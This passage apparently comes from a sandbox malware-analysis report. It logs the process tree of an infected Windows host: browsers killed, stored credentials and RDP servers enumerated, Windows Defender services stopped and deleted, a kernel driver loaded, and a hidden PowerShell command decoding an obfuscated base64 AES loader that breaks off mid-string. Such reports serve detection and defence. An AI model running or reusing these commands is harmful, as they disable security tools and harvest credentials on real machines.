        "taskkill" /IM whale.exe
        7⤵
        Kills process with taskkill
        
        PID:4380
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM 360browser.exe
        7⤵
        Kills process with taskkill
        
        PID:5496
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM qqbrowser.exe
        7⤵
        
        PID:6052
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /IM browser.exe
        7⤵
        Kills process with taskkill
        
        PID:6100
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM chrome.exe
        7⤵
        Kills process with taskkill
        
        PID:2896
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM msedge.exe
        7⤵
        
        PID:5128
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM brave.exe
        7⤵
        Kills process with taskkill
        
        PID:1960
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM opera.exe
        7⤵
        
        PID:1956
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM vivaldi.exe
        7⤵
        Kills process with taskkill
        
        PID:4824
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM firefox.exe
        7⤵
        
        PID:5316
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM dragon.exe
        7⤵
        Kills process with taskkill
        
        PID:1180
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM maxthon.exe
        7⤵
        Kills process with taskkill
        
        PID:4308
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM uc_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:1628
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM slimjet.exe
        7⤵
        Kills process with taskkill
        
        PID:4760
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM cent_browser.exe
        7⤵
        Kills process with taskkill
        
        PID:2432
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM epic.exe
        7⤵
        Kills process with taskkill
        
        PID:3544
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM torch.exe
        7⤵
        Kills process with taskkill
        
        PID:2900
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM whale.exe
        7⤵
        Kills process with taskkill
        
        PID:6060
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM 360browser.exe
        7⤵
        
        PID:1896
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM qqbrowser.exe
        7⤵
        
        PID:2916
        
        C:\Windows\system32\taskkill.exe
        
        "taskkill" /F /IM browser.exe
        7⤵
        Kills process with taskkill
        
        PID:536
        
        C:\Windows\system32\vaultcmd.exe
        
        "vaultcmd" /list
        7⤵
        
        PID:1540
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        7⤵
        
        PID:5128
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $entries = cmdkey /list | Select-String \"TERMSRV\" -Context 0,3 foreach ($entry in $entries) { $target = ($entry -split \"target=\")[1].Trim() $ip = $target -replace \"TERMSRV/\", \"\" $userLine = $entry.Context.PostContext | Select-String \"User\" $user = if ($userLine) { ($userLine -split \":\")[1].Trim() } else { \"N/A\" } Write-Output \"Server: $ip | Username: $user\" } "
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3300
        
        C:\Windows\system32\cmdkey.exe
        
        "C:\Windows\system32\cmdkey.exe" /list
        8⤵
        
        PID:640
        
        C:\Windows\system32\certutil.exe
        
        "certutil" -store My
        7⤵
        
        PID:220
        
        C:\Windows\system32\certutil.exe
        
        "certutil" -store -user My
        7⤵
        
        PID:2428
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-VpnConnection | ConvertTo-Json"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:1284
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command " $regPath = \"HKCU:\Software\Microsoft\Terminal Server Client\Servers\" if (Test-Path $regPath) { Get-ChildItem $regPath | ForEach-Object { $server = $_.PSChildName $usernamePath = Join-Path $_.PSPath \"UsernameHint\" $username = if (Test-Path $usernamePath) { (Get-ItemProperty -Path $usernamePath -Name \"(default)\" -ErrorAction SilentlyContinue).\"(default)\" } else { \"\" } Write-Output \"Server:$server,Username:$username\" } } "
        7⤵
        Command and Scripting Interpreter: PowerShell
        Hide Artifacts: Ignore Process Interrupts
        
        PID:5716
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list
        7⤵
        
        PID:6084
        
        C:\Windows\system32\cmdkey.exe
        
        "cmdkey" /list:TERMSRV/69.48.201.74
        7⤵
        
        PID:4568
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
        7⤵
        
        PID:536
        
        C:\Windows\system32\hostname.exe
        
        "hostname"
        7⤵
        
        PID:5348
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-WmiObject Win32_VideoController | ForEach-Object { $_.Name }"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3176
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command "Get-NetAdapter | Where-Object { $_.Status -eq 'Up' -and $_.InterfaceDescription -notmatch 'virtual|loopback' } | Sort-Object -Property LinkSpeed -Descending | Select-Object -First 1 -ExpandProperty MacAddress"
        7⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:3480
        
        C:\Windows\System32\Wbem\wmic.exe
        
        "wmic" /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName,pathToSignedProductExe,productState /Format:List
        7⤵
        
        PID:5784
        
        C:\Windows\system32\netsh.exe
        
        "netsh" advfirewall show allprofiles state
        7⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        
        PID:1236
      - C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10412830101\apple.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:4872
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe"
        7⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3756
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F211.tmp\F212.tmp\F213.bat C:\Users\Admin\AppData\Local\Temp\261.exe"
        8⤵
        
        PID:4256
        
        C:\Users\Admin\AppData\Local\Temp\261.exe
        
        "C:\Users\Admin\AppData\Local\Temp\261.exe" go
        9⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:3320
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F2FB.tmp\F2FC.tmp\F2FD.bat C:\Users\Admin\AppData\Local\Temp\261.exe go"
        10⤵
        Drops file in Program Files directory
        
        PID:5048
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        11⤵
        Launches sc.exe
        
        PID:2424
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:5316
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        11⤵
        Delays execution with timeout.exe
        
        PID:4892
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4060
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        11⤵
        Launches sc.exe
        
        PID:4048
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3132
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        11⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:3916
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:640
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        11⤵
        Launches sc.exe
        
        PID:4320
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        11⤵
        
        PID:4492
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:5840
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        11⤵
        Launches sc.exe
        
        PID:5068
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        11⤵
        
        PID:2592
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:4400
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        11⤵
        Launches sc.exe
        
        PID:5592
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        11⤵
        
        PID:4024
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        11⤵
        Launches sc.exe
        
        PID:5800
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        11⤵
        Launches sc.exe
        
        PID:1656
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        11⤵
        
        PID:1920
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:5376
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        11⤵
        Launches sc.exe
        
        PID:5776
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        11⤵
        Modifies security service
        
        PID:5704
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4408
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        11⤵
        Launches sc.exe
        
        PID:4052
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        11⤵
        
        PID:5124
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:5468
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        11⤵
        Launches sc.exe
        
        PID:1376
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        11⤵
        
        PID:872
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:5656
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        11⤵
        Launches sc.exe
        
        PID:944
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:4264
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:4676
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:6072
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:5368
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:4056
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:1084
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:4928
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:932
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:5548
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:1840
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:2952
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:5276
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:5260
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:4332
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:5016
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:5024
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3216
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3616
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:3280
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:3764
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:5996
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:2432
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:4584
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:3972
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:2352
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:6136
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:1092
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:4860
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:1448
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:2496
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:1228
      - C:\Users\Admin\AppData\Local\Temp\10413640101\7ac44a072c.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413640101\7ac44a072c.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Writes to the Master Boot Record (MBR)
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3020
      - C:\Users\Admin\AppData\Local\Temp\10413650101\HAe88WC.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413650101\HAe88WC.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5344
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4304
      - C:\Users\Admin\AppData\Local\Temp\10413660101\h8NlU62.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413660101\h8NlU62.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:5756
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4080
      - C:\Users\Admin\AppData\Local\Temp\10413670101\XOPPRUc.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413670101\XOPPRUc.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:3288
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4848
      - C:\Users\Admin\AppData\Local\Temp\10413680101\7IIl2eE.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413680101\7IIl2eE.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1840
        
        C:\Windows\SysWOW64\CMD.exe
        
        "C:\Windows\system32\CMD.exe" /c copy Expectations.cab Expectations.cab.bat & Expectations.cab.bat
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4408
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:6068
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /I "opssvc wrsa"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3128
        
        C:\Windows\SysWOW64\tasklist.exe
        
        tasklist
        8⤵
        Enumerates processes with tasklist
        System Location Discovery: System Language Discovery
        
        PID:4964
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:2432
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c md 418377
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4876
        
        C:\Windows\SysWOW64\extrac32.exe
        
        extrac32 /Y /E Leon.cab
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3160
        
        C:\Windows\SysWOW64\findstr.exe
        
        findstr /V "BEVERAGES" Compilation
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:1672
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:3392
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4168
        
        C:\Users\Admin\AppData\Local\Temp\418377\Passwords.com
        
        Passwords.com N
        8⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:3016
        
        C:\Windows\SysWOW64\choice.exe
        
        choice /d y /t 5
        8⤵
        System Location Discovery: System Language Discovery
        
        PID:4056
      - C:\Users\Admin\AppData\Local\Temp\10413690101\captcha.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413690101\captcha.exe"
        6⤵
        Executes dropped EXE
        
        PID:3092
      - C:\Users\Admin\AppData\Local\Temp\10413700101\PQPYAYJJ.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413700101\PQPYAYJJ.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        
        PID:2588
        
        C:\Users\Admin\Abspawnhlp.exe
        
        "C:\Users\Admin\Abspawnhlp.exe"
        7⤵
        Executes dropped EXE
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:3204
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        8⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of SetThreadContext
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:5580
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        
        C:\Users\Admin\AppData\Local\NotepadComGKR\Abspawnhlp.exe
        9⤵
        Loads dropped DLL
        System Location Discovery: System Language Discovery
        
        PID:112
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\SysWOW64\cmd.exe
        9⤵
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:4468
      - C:\Users\Admin\AppData\Local\Temp\10413710101\50702d4ef9.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10413710101\50702d4ef9.exe"
        6⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:5016
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10413721121\5ym0ZYg.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:2588
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10413721121\5ym0ZYg.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1616
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnh